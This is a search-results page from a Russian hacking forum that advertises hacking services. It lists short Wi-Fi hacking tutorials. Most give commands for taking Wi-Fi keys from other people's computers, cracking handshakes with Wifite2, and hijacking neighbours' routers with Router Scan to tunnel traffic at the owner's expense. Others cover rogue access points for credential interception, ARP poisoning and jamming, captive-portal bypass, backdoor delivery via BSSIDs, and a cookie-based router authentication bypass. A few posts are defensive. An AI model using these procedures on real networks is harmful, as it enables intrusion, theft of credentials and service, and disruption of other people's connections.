Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'взлом wifi'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • XAKERSAY
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 17 results

  1. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете узнать пароль от Wi-Fi роутера без какого-либо взлома. Давайте на минуточку представим, что вам в руки попал чей-то компьютер, на котором вам нужно узнать пароль от сети Wi-Fi, к которому он подключен. Сегодня мы покажем вам, как это сделать ! Погнали! 1. Вызываем командную строку введя "cmd" в поиске. 2. Нажимаем на "Запуск от имени администратора". 3. Затем в командной строке пишем "netsh wlan show profiles". После чего вы узнаете название сети. 4. Далее вводим "netsh wlan show profile name="название сети" key=clear". Сам пароль от Wi-Fi будет показан в поле "Key Content". Далее вам остается сделать скриншот или сохранить в избранное, чтобы не проделывать данные действия повторно. Вот таким вот интересным способом вы можете заполучить практически любой пароль от Wi-Fi, если для этого будет созданы определенные условия. Не нужно париться с программами, со взломами, все делается быстро и без каких-либо следов и лишних телодвижений. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как создать точку доступа для перехвата данных. Зачастую люди не хотят заботиться о безопасности своих данных, и подключаясь к открытому Wi-Fi сильно рискуют отдать свои данные в руки злоумышленника. Сейчас будет рассмотрен способ создания файловой точки доступа для подобного перехвата. Установка: git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git cd WiFi-Pumpkin chmod +x installer.sh sudo ./installer.sh --install wifi-pumpkin Будет запущен графический интерфейс, зайдите в раздел "Seetings" и дайте название вашей точке доступа, затем перейдите в "Activity Monitor Settings" и поставьте галочки на пунктах "HTTP-Requests", "HTTP-Authentication" и "Pumpkin Proxy". С помощью данной небольшой программы вы можете легко перехватывать данные из сети. Поэтому если вы хотите потренироваться в этом или найти методы защиты от подобных перехватов, то советую попробовать использовать данную программу по своему назначению. Вполне возможно, что она вам пригодится. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как запретить доступ к сети любой программе на компьютере. При необходимости вы можете заблокировать доступ в интернет определенному ПО. Сделать это можно при помощи встроенных в систему функций. В решении данной задачи нам поможет брандмауэр Windows, который, по сути, является одним из самых простых способов заблокировать программе доступ к Интернету, не требующий установки каких-либо сторонних средств. Погнали! 1. Первым делом нажимаем "Win+R" и вводим команду "firewall.cpl" 2. Затем слева нажимаем "Дополнительные параметры", после чего переходим в "Правила для исходящего подключения" 3. Здесь в правой части нажимаем на "Создать правило", выбираем "Для программы", указываем путь, ставим галочку на "Блокировать подключение", затем "Далее", указываем "Имя" и нажимаем "Готово". Это отличный способ, чтобы запретить приложениями доступ в сеть. Это поможет значительно повысить безопасность вашего компьютера и сохранность ваших данных. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Приветствую, хакеры! В данной статье я хочу рассказать вам о том, как взломать Wi-Fi при помощи Kali Linux. Для начала взлома вам понадобится сетевой Wi-Fi адаптер, который имеет поддержку режима мониторинга, совместимый с Kali Linux. Wifite2 установлен в Kali Linux по умолчанию. Лучше всего использовать данный дистрибутив на виртуальной машине или же прямо на компьютере, который имеет обновление загрузочной записи и возможность выбора операционной системы. По сути, Wifite2 можно установить в любом другом дистрибутиве, но лучше всего он будет работать если у вас Kali Linux, так как он является наиболее распространенным. При условии, что Wifite2 не установлен в вашей системе, вы можете скачать эту утилиту из репозитория на GitHub. Погнали! 1. Для того, чтобы установить Wifite2, в терминале введите команды, показанные ниже, для клонирования репозитория и запуска инсталляции: git clone https://github.com/derv82/wifite2.git cd wifite2 ls sudo python setup.py install 2. Для запуска используем следующую команду: ./Wifite.py Для того, чтобы получить подробную информацию по использованию введите команду wifite -h Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  5. Приветствую, хакеры! Сегодня мы поговорим о том, как при наименьших усилиях получить наибольший результат, чем, в нашем случае, является бесплатный интернет. Для реализации нам понадобится программа Router Scan. 1. Сначала программа сама попробует подобрать пароль и логин под роутер соседа, но тут не всегда выходит желаемый результат. 2. Если же проге не удалось узнать пароль и логин, то тут нам поможет использование некоторых багов и слабостей каждого из вида роутеров, что позволит нам либо получить информацию, либо обойти стороной авторизацию. Сперва нам потребуется просканировать сети в радиусе действия. Для этого запускаем программу, она спросит, хотим ли мы отправлять полученные данные в общую базу данных, ну и попросит подтвердить пользовательское соглашение. 3. Теперь переходим в последнюю вкладку в программе и выставляем 2 галочки. Теперь следует подождать, пока программа определит WiFi сети. 4. Когда появится сеть, которую мы хотели взломать, жмём на ней ПКМ, потом "Obtain key with WPS" и в появившемся окне "Start Audit". 5. После этого начнётся процесс подбора логина и пароля. Просто ждём, когда программка добродушно предоставит нам нужные данные. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  6. Приветствую, хакеры! В данной статье я расскажу вам о том, как отследить какие приложения используют интернет-трафик. Если вас беспокоит ограниченный тарифный план сотового оператора, когда у вас нет доступа к Wi-Fi, или вы хотите убедиться, что определенные приложения не отсылают данные обратно на свои сервера, когда они этого делать не должны – воспользуйтесь приложением GlassWire для Android. Приложение GlassWire тщательно отслеживает использование данных другими приложениями – вы можете видеть, какие приложения на вашем смартфоне используют больше всего интернета (загружая и отправляя данные), можете получать немедленные предупреждения, когда новое приложение начинает связываться с интернетом, и многое другое. Для этого на главной странице приложения необходимо выбрать типсети и период, за который будут отображаться данные о расходе трафика. Если какие-то программы используют соединение в данный момент, это будет отображаться соответствующими иконками. Помимо этого, вы можете установить собственный лимит расхода интернет-трафика. В таком случае приложение будет уведомлять вас, если вы его превысите. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  7. Приветствую, хакеры! В данной статье хочу рассказать о том каким образом хакеры могут без труда взламывать Wi-Fi при помощи Kali Linux. Для начала потребуется сетевой Wi-Fi адаптер с поддержкой режима мониторинга, совместимый с Kali Linux. Wifite2 установлен в Kali Linux по умолчанию. Рекомендую установить этот дистрибутив на виртуальной машине или прямо на компьютере с обновлением загрузочной записи и возможностью выбора операционной системы. Если Wifite2 не установлен в вашей системе, вы можете скачать эту утилиту из репозитория на GitHub. Для этого введите в терминале команды, показанные ниже, для клонирования репозитория и запуска инсталляции: $ git clone https://github.com/derv82/wifite2.git $ cd wifite2 $ ls $ sudo python setup.py install Запуск $ ./Wifite.py Теперь введите команду wifite -h для подробной информации по использованиюю. С помощью такой программы, возможно взламывать практически любую сеть, поэтому рекомендую ее к использованию. Это одна из самых эффективных и простых в освоении утилит. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  8. Приветствую, хакеры! В этой статье хочу рассказать, как можно узнать пароли от всех Wi-Fi сетей к которым вы когда-либо подключались. Windows хранит данные про все сети, к которым подключалось устройство, в том числе и пароли от них. При желании вы можете получить к ним доступ с помощью командной строки. Для этого вам необходимо выполнить следующие пункты: 1. Откройте командную строку от имени администратора. 2. Введите команду «netsh wlan show profiles», чтобы посмотреть список всех Wi-Fi сетей, к которым вы подключались ранее с этого устройства. 3. Выберите имя нужной сети и введите команду «netsh wlan show profile name=Имя_сети key=clear». Вместо «Имя_сети» введите название Wi-Fi сети, пароль от которого необходимо узнать. Если оно состоит из нескольких слов, необходимо взять его в кавычки. После этого в командную строку будет выведена вся известная компьютеру информация о Wi-Fi сети, а пароль от неё будет показан возле пункта «Содержимое ключа». Теперь вы можете использовать его для подключения, если ранее этот пароль никто не изменял. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  9. Приветствую, хакеры, в этой статье хочу рассказать о том, как заблокировать постореннего человека, подключенного к вашей сети. Необходимо попасть в меню управления своим Wi-Fi роутером, выполните команду «ipconfig» в командной строке, скопируйте адрес из раздела «Основной шлюз», после чего вставьте его в адресную строку браузера и авторизуйтесь в системе, используя данные на задней части вашего роутера. На разных маршрутизаторах отключение устройства от Wi-Fi сети происходит немного по-разному. Например, если вы пользуетесь роутером TP-Link, зайдите в меню «Беспроводной режим» → «Статистика беспроводного режима» и нажмите «Запретить» возле нужного адреса. После этого необходимо перейти в раздел «Фильтрация MAC-адресов» и нажать кнопку «Включить», чтобы блокировка начала работать. Если же вы пользуетесь роутером от Asus, после перехода в меню маршрутизатора необходимо зайти в раздел «Фильтрация адресов» и вставить блокируемый адрес, предварительно скопировав его из раздела «Карта сети» → «Клиенты». В настройках роутеров других производителей названия параметров могут отличатся, но, в целом, порядок действий везде один и тот же. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информаци.
  10. Инструкция по установке и поиску роутеров: Скачиваем Router Scan с официального сайта (http://stascorp.com/load/1-1-0-56) Теперь нам понадобятся диапазоны ip адресов. Взять их можно с этого сайта (https://4it.me/getlistip), введя название любого города. Полученные диапазоны нужно вписать в соответствующее поле в верхней панели Router Scan. В "Scan ports" можно оставить значения по умолчанию. В "Scanning modules" нужно выбрать только три первых пункта. После нажатия "Start scan" во вкладке "Good Results" начнут появляться потенциально уязвимые устройства с полученными авторизационными данными. Если при подобной проверке ip диапазона вашего города вы нашли в "Good Results" свой роутер, то уже на этом этапе лучше обратиться в техподдержку или вручную обновить прошивку роутера, скачав её с официального сайта. Подключению к роутеру и поднятие VPN Подключение к уязвимому роутеру реализуется за счет браузера. В поисковую строку нужно вписать запрос в виде : Откроется форма входа, в которую нужно вписать данные из колонки "Authorization" в Router Scan. Далее идет процесс поднятия VPN. У каждого роутера разный интерфейс, а некоторые данную функцию вообще не поддерживают. Если объяснять поверхностно, то для начала нужно будет включить службу PPTP вписав придуманные авторизационные данные и выбрав уникальный локальный ip. После чего настроить NAT пробросив порты 1723 и 1729. Подключаться к созданному VPN можно через встроенную службу Windows, которая находится по пути "Пуск" -> "Панель управления" -> "Сеть и интернет" -> "Центр управления сетями и общим доступом" -> "Настройка нового подключения или сети" -> "Подключение к рабочему месту" Выбрав "Использовать моё подключение к интернету(VPN)" нужно вписать ip роутера и придуманные ранее авторизационные данные. Готово, теперь весь трафик атакующего ПК будет идти за счет владельца взломанного роутера. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  11. В повседневной жизни мы часто сталкиваемся с ситуацией, когда необходимо получить доступ в интернет. В кафе, ресторане или в общественном месте всегда можно найти точку доступа. Нередко попадаются роутеры с «гостевым доступом». Но бывает, что бесплатный Wi-Fi защищен Captive Portal. Иными словами, имеется открытая сеть Wi-Fi, к которой можно подключиться без пароля, но при попытке зайти на любой сайт, нас будет перебрасывать на страницу, где нужно ввести учётные данные, оплатить, подтвердить номер телефона с помощью СМС или что-то похожее. Конечно, желания оплачивать такую услугу совершенно нет, поэтому мы воспользуемся утилитой, которая будет обходить данную защиту. Заходим в терминал и прописываем команды для установки: обновляем пакеты: apt update apt upgrade качаем пакеты: apt -y install sipcalc nmap wget Теперь инструмент: wget https://raw.githubusercontent.com/systematicat/hack-captive-portals/master/hack-captive.sh Делаем файл исполняемым и запускаем: chmod u+x hack-captive.sh ./hack-captive.sh После фразы "Pwned! Now you can surf the Internet!", вы можете спокойно пользоваться интернетом. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  12. Привет, хакеры! Сегодня я расскажу о способе заражения жертвы вирусом через сеть Wi-Fi. Итак, у нас есть в наличии backdoor payload. Не шифрованный и без всяких прочих приблуд способных защитить нас от обнаружения. В данной схеме мы проводим атаку с помощью смены своего BSSID, это означает что вы сможете сменить свой BSSID и инфицировать свою цель шаг за шагом. На заметку: Вы можете использовать MANA-Toolkit: https://github.com/sensepost/mana. Допустим у нас есть пейлоад “fec8b00011ddc00945f1”. Что же нам необходимо делать далее? Шаг 1 Нам необходимо создать фейковую точку доступа, которую мы назовём "Фейк" (что бы вам было понятнее) и мак адрес, у неё будет 00:fe:c8:b0:00:11 Мак адрес 00:fe:c8:b0:00:11 это наш загружаемый пейлоад т.к. название нашего пейлоада “fec8b00011ddc00945f1”Это секция пейлоада “fec8b00011ddc00945f1”Шаг 2 Система с беком сканит ESSID нашего фейка и дампит BSSID для неё. Наш код должен сделать так: fe:c8:b0:00:11 ==> fec8b00011Шаг 3 Атакующая система создаёт фейковую точку доступа с именем "Фейк" и маком 00:dd:c0:09:45:f1 Мак-адрес 00:dd:c0:09:45:f1 это наш инжектируемый пейлоад “ddc00945f1”Это секция пейлоада “fec8b00011ddc00945f1”Шаг 4 Система с бекдором должна дампить данную секцию BSSID или мак dd:c0:09:45:f1 ==> ddc00945f1 После данных шагов со сканом мы имеем пейлоад fec8b00011ddc00945f1 в инфицированной системе. Теперь, разобравшись как работает данный метод мы рассмотрим команды для создания фейк AP: ifconfig wlan0 down iw reg set BO ifconfig wlan0 up iwconfig wlan0 txpower 30 С помощью этих команд мы увеличиваем мощность нашей AP. Примечание: эти команды нужно писать до создания wlan0mon для вашего wlan0. Создания монитора для wlan карты это обязательный шаг для создания фейковой AP. Делаем монитор этой командой: "airmon-ng start wlan0", если не работает, то используйте команду iwconfig и посмотрите название своего адаптера. Далее пойдут команды с кратким описанием: airmon-ng start wlan0 - запускаем интерфейс; airbase-ng -a 00:fe:c8:b0:00:11 –essid “Fake” -I 10 -0 wlan0mon - делаем первый кусок пейлоада; sleep 15 - дайте точке поспать 15 секунд; killall airbase-ng - если у точки бессонница; airbase-ng -a 00:dd:c0:09:45:f1 –essid “Fake” -I 10 -0 wlan0mon - второй кусок пейлоада; sleep 15 - дайте точке поспать 15 секунд; killall airbase-ng - если у точки бессонница. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  13. Глушение WiFi-сети с помощью LANs Начнем с LANs. Она умеет не только глушить WiFi, но и другие вещи: Шпионит за пользователямиИндивидуально травит таблицы ARP целевой машины, роутера и при необходимости — сервера DNSРадиус действия глушения сильно зависит от мощности адаптера, но у скрипта есть настройки, которые позволяют глушить всех подряд или только одного клиента. Здесь все просто: скачиваем и устанавливаем зависимости и качаем сам скрипт. $ sudo apt install -y python-nfqueue python-scapy python-twisted nbtscan $ git clone https://github.com/DanMcInerney/LANs.py.git $ cd LANs.py/ Теперь можно запускать наш скрипт, чтобы начать глушение WiFi. $ python lans.py -u -p Ключи -u и -p означают активное обнаружение цели для ARP-спуфинга и вывода всех интересных незашифрованных данных, которые они отправляют или запрашивают. Опции -ip здесь нет, поэтому будет выполнено ARP-сканирование сети и его результаты будут сравниваться с результатами живого «неразборчивого» захвата. В результате получится список всех клиентов сети. Нажимайте Ctrl + C для остановки поиска, когда построите карту сети и посмотрите списки подключенных клиентов. Для тех же целей, кстати, можно успешно использовать Nmap (см. также Nmap: обнаружение хостов сети). Точечный вариант глушения будет выглядеть так: $ python lans.py --jam --accesspoint роутера> -s для пропуска> Здесь: —jam — глушить все или некоторые беспроводные точки 2,4 ГГц и клиентов в пределах досягаемости; если необходимо, то вместе с этим можно использовать дополнительные аргументы (ниже);-s — так можно задать MAC, который не будет деавторизован;—accesspoint — тут можно ввести MAC конкретной точки доступа, которая будет выступать в качестве цели.Глушение всех сетей Wi-Fi будет выглядеть так: $ python lans.py --jam Глушение только одной точки доступа: $ python lans.py --jam --accesspoint Здесь тоже можно задать некоторые дополнительные опции: -ch — ограничить глушение одним каналом;—directedonly — не отправлять пакеты деаутентификации на широковещательные адреса точек доступа, а только парам из клиента и хотспота;—accesspoint — так можно указать конкретную точку доступа в качестве цели.Глушение WiFi-сети с помощью WiFiJammer Для глушения WiFi можно также использовать утилиту wifijammer. Она крайне проста в использовании, так что обсуждать здесь почти нечего: без параметров она просто будет заглушать все, что найдет в радиусе досягаемости адаптера. Чтобы не задеть своих, можно исключить некоторые MAC-адреса с опцией -s. Установка wifijammer: $ git clone https://github.com/DanMcInerney/wifijammer.git $ cd wifijammer/ $ sudo python2 wifijammer.py --help Запуск wifijammer: $ sudo python2 wifijammer.py -s для исключения> На этом все! Теперь, с помощью рассмотренных инструментов вы сможете с легкостью глушить WiFi. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  14. Взлом роутера обычно является либо самой простой, либо самой сложной задачей - его сложность варьируется от ввода имени пользователя и пароля по умолчанию, и ты максимально заебёшься, пытаясь попасть внутрь роутера по telnet или ssh. В обоих этих случаях перебор паролей не очень полезен, но это довольно простой метод, мы ведь не ищем лёгких путей, да? Однако я скажу тебе следующее: Это все еще роутер, который я использовал в своей домашней сети, потому что он предоставляется моим интернет-провайдером, и поскольку он является одним из основных поставщиков в моей области, многие люди страдают от этих уязвимостей. Ну ладно, теперь к делу. ЭТАП I. НАЙДИ IP РОУТЕРА. Так как это самый простой шаг, и есть бесчисленное множество способов сделать это, я просто приведу несколько различных возможностей: Проверка сетевых настроек с помощью панелей настроек ОСИспользование ipconfig в Windows и ifconfig на машинах Unix из терминалаИспользование Fuzzer в качестве инструмента обнаружения цели.Найденный мной IP роутера - 192.168.0.1 ЭТАП II. СОБЕРИ ТРАФФИК. Я решил, что хороший способ начать, будет исследовать веб-сервер роутера для чего-то за пределами того, что видно невооружённым глазом. По этой причине я использовал HTTPView и проанализировал трафик от первой попытки входа в систему. Чтобы помочь себе, я применил некоторые фильтры, чтобы избавиться от медиа и стилей ответов с сервера. Вот результат, который я добыл: Этой информации нам хватит. ЭТАП III. ПРОАНАЛИЗИРУЙ ТРАФФИК И НАЙДИ УЯЗВИМОСТИ. Теперь, когда у нас есть нужное количество данных, мы должны проанализировать его, чтобы увидеть, наткнулись ли мы на что-то интересное. Сразу можно игнорировать все файлы jQuery, а также языковые файлы или, по крайней мере, не начинать поиск оттуда. Поскольку я работаю в Chrome, я не могу анализировать ответы прямо из HTTPView, поэтому мне нужно реплицировать запрос в Rest и выполнять там анализ. Есть этот интересная штука, которую я нашел в /menu.html Присмотрись хорошенько. Хотя определение функции readCookie отсутствует, можно с уверенностью предположить, что она считывает файл cookie, а userData-это имя этого файла cookie. Из строки 247 мы можем сделать вывод, что значение этого файла cookie должно быть root. Чтобы изменить куки, я использовал расширение EditThisCookie и добавил файл куки с уже упомянутым именем и значением и вуаля, мы внутри.. Всё так просто? ЭТАП IV. ПРОСКАНИРУЙ РОУТЕР НА НАЛИЧИЕ ДРУГИХ ROOT'ОВ. Если мы попытаемся перемещаться в любом месте, мы встретим тот же экран входа в систему. Есть что-то еще, необходимое для изменения настроек роутера. Однако, у нас есть доступ к гораздо большему количеству страниц, поэтому я думаю, что стоит сделать сканирование на маршрутизаторе. Для этого я буду использовать сканер с уже установленным файлом cookie userData=root. В addiotion я включу опцию "направленное сканирование" на вкладке второго пилота, чтобы сканер полагался на мои действия в качестве ввода. После запуска сканера перейдите к 5-10 страницам на маршрутизаторе, которые требуют входа в систему, например /basicSetup.html и / или basicDHCP.html и пусть инструмент делает свою работу. После того, как траффик перестал поступать, мы можем проанализировать результаты для интересных выводов. Для этого я предпочитаю сортировать результаты по пути, чтобы убедиться, что я не пропустил ни одного важного файла или каталога. И через некоторое время я столкнулся с этим: ЭТАП V. ПОЛУЧИ ПОЛНЫЙ КОНТРОЛЬ. DocsisConfigFile.xml - это обычно файл, который содержит кучу полезной информации о конфигурации маршрутизатора, посмотрим, что внутри: Да, всё так просто. Это определенно работает - файд содержит много интересной информации, включая имя пользователя и пароль в обычном тексте, благодаря которым мы и получили полный доступ. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  15. Привет, хакеры, в данной статье покажу способ взлома Wi-Fi. Это самый простой способ. Есть 2 версии wifite, использовать будем вторую — Wifite2 Работать будем на Kali Linux. Помимо Кали необходим Wi-Fi адаптер. Некоторые Wi-Fi адаптеры могут не подходить и придётся использовать два адаптера. Как в моём случае(TP-Link 722). Если 2 адаптера, программа может спросить какой выбрать. Выбираете адаптер для сканирования сетей. Скачиваем wifite2: git clone https://github.com/derv82/wifite2.git Заходим в директорию: cd wifite2 И запускаем: ./Wifite.py Начался мониторинг сетей. Когда появиться сеть, останавливаете мониторинг (ctrl + c) Выбираете свою сеть обозначив номер 1 сети или выбрав сети от и до. Например: 2 или 2-5. Начинается захват хэндшейка. Мы выкидываем какого-то пользователя с его сети(да,теперь вы видели всё) при попытке переподключиться он обязан ввести пароль. А сессия останавливается и этот пароль сохраняется в текстовом файле. Выводы: если вы отключились от своей точки, задумайтесь. И старайтесь сократить дальность wifi до минимума, не заходя за стены. Взлом чего-либо — незаконно. Я никого ни к чему не призываю, статья написана в ознакомительных целях!
  16. Привет, хакеры, продолжаем тему узнавания паролей от беспроводных сетей. В данной статье будет рассказано про способы получения подобной информации на Linux. Как узнать пароль от WiFi на Linux Для подключения к беспроводной сети в Linux Используется либо Network Manager либо WPA Supplicant. Первое является программой с собственным граф. Интерфейсом, а второе подключает компьютер к беспроводной сети, используя стандартную консоль. Оба инструмента сохраняет все настройки в открытую. Однако перед освоением команд, необходимо воспользоваться граф. Интерфейсом, необходимо это для получения информации об подключениях компьютера к различным сетям. Нажимаем на значок беспроводной сети возле часов и тыкаем “Сетевые соединения”. Отлично, видно сети к которым компьютер подключался и подключен прямо сейчас. Для получения пароля берем одну из сетей и нажимаем на ней “Изменить”. После нажимаем на вкладку “Защита Wi-Fi”, где отмечаем пункт “Показывать пароль” Для выполнения данной функции не требуется пароль администратора, то есть выполняется любым пользователем. Ранее оговаривалось, что программа сохраняет все данные в открытом виде: В папке /etc/NetworkManager/system-connections/. Просмотреть файлы ls -l /etc/NetworkManager/system-connections/ Для просмотра названий и паролей вводим: sudo egrep -h -s -A 9 --color -T 'ssid=' /etc/NetworkManager/system-connections/* Вторая программа, использующая командную строку, для проверки подключений хранит всю свою информацию по адресу - /etc/wpa_supplicant.conf. Однако запустить программу можно и при помощи ключа, который указан после файла с неизвестным названием и положением. В случае автоматический загрузки данной программы, есть возможность изучения файла - /etc/rc.local на наличие команды, которая поможет в поиски настроек беспроводной сети. Данный файл можно найти, взглянув на статус службы: systemctl status wpa_supplicant.service В случае ручного запуска программы, поиск осуществляется в данных категориях: grep supplicant ~/.bash_history Просмотр содержимого папки программы: ls -l /etc/wpa_supplicant/ Код для вывода содержимого файла: cat /etc/wpa_supplicant/wpa_supplicant.conf
  17. Привет, хакеры, может произойти такая ситуация, что будет утерян пароль от беспроводной сети, к которой подключен пользователь, возможно просто хотите узнать к каким сетям компьютер был подключен раньше. В данной и следующей статье я расскажу, как проверить эти данные для Windows и Linux соответственно. Данная инструкция предназначена для Windows. Как узнать пароли WiFi Узнать пароль от сети, к которой подключен компьютер пользователя в момент проверки, можно при помощи графического интерфейса. Для этого переходим в “Центр управления сетями и общим доступом”. Далее кликаем на название сети, скриншот: Появляется новое окошко, тыкаем “Свойства беспроводной сети”, после чего нажимаем на вкладку “Безопасность” и отмечаем пункт “Отображать вводимые знаки” Теперь о том, как проверить к каким сетям компьютер был подключен ранее и какие использовал при этом пароли. Рассмотри несколько способов. Первый заключается в использовании консоли Windows, а второй в использовании специального ПО. Начнем с первого варианта и откроем консоль при помощи сочетании клавиш “Win + R” и напишем команду “cmd”, теперь можно пользоваться командной строкой. Чтобы просмотреть возможные профили, необходимо прописать: netsh wlan show profile Идем дальше, для просмотра паролей всех сетей: netsh wlan show profile name=* key=clear Для просмотра пароля определенной сети: netsh wlan show profile name="имя_сети" key=clear Заменяем настоящее имя сети на необходимое, к примеру: netsh wlan show profile name="dlink" key=clear В данном примере просматривается 4 профиля и их пароли. Но данный компьютер подключался к большему количеству беспроводных сетей. Для этого используется второй способ со специальным программным обеспечением, а именно программа – WirelessKeyView. Программа с закрытым исходным ходом, однако все равно является абсолютно бесплатной. Никаких особых вещей рассказывать про инструмент не нужно, здесь все интуитивно понятно. Здесь видим все сети и пароли, к которым был подключен компьютер. В следующей статье ждите информацию по Linux.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.